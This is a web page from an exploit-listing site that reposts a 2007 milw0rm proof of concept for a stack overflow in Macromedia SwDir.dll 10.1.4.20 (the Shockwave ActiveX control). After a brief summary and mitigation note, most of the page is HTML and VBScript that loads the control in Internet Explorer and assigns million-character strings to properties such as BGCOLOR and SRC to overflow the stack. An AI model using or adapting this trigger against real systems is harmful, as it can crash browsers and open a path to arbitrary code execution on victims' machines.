Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
SwDir.dll
by:
shinnai
7.5
CVSS
HIGH
Stack Overflow
CWE
Product Name: SwDir.dll
Affected Version From: 10.1.4.20
Affected Version To: 10.1.4.20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow

This exploit targets the Macromedia SwDir.dll version 10.1.4.20. It utilizes multiple methods to trigger a stack overflow vulnerability. By manipulating certain values in the object and select elements, an attacker can cause a stack overflow and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Macromedia SwDir.dll. Additionally, users should exercise caution when interacting with untrusted websites or files.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------


<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
  <option value = "BGCOLOR">BGCOLOR</option>
  <option value = "SRC">SRC</option>
  <option value = "AutoStart">AutoStart</option>
  <option value = "Sound">Sound</option>
  <option value = "DrawLogo">DrawLogo</option>
  <option value = "DrawProgress">DrawProgress</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="BGCOLOR" then
     argCount   = 1
     arg1=String(1000000, "A")
     Shockwave.BGCOLOR = arg1   
   elseif Pucca.value="SRC" then
     argCount   = 1
     arg1=String(1000000, "A")
     Shockwave.SRC = arg1
   elseif Pucca.value = "AutoStart" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.AutoStart = arg1
   elseif Pucca.value = "Sound" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.Sound = arg1
   elseif Pucca.value = "DrawLogo" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.DrawLogo = arg1
   elseif Pucca.value = "DrawProgress" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.DrawProgress = arg1
   else
     MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
     "supreme excellence consists in breaking the enemy's resistance without fighting."
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-03-07]

Navigation

Suggest Exploit

Services By CQR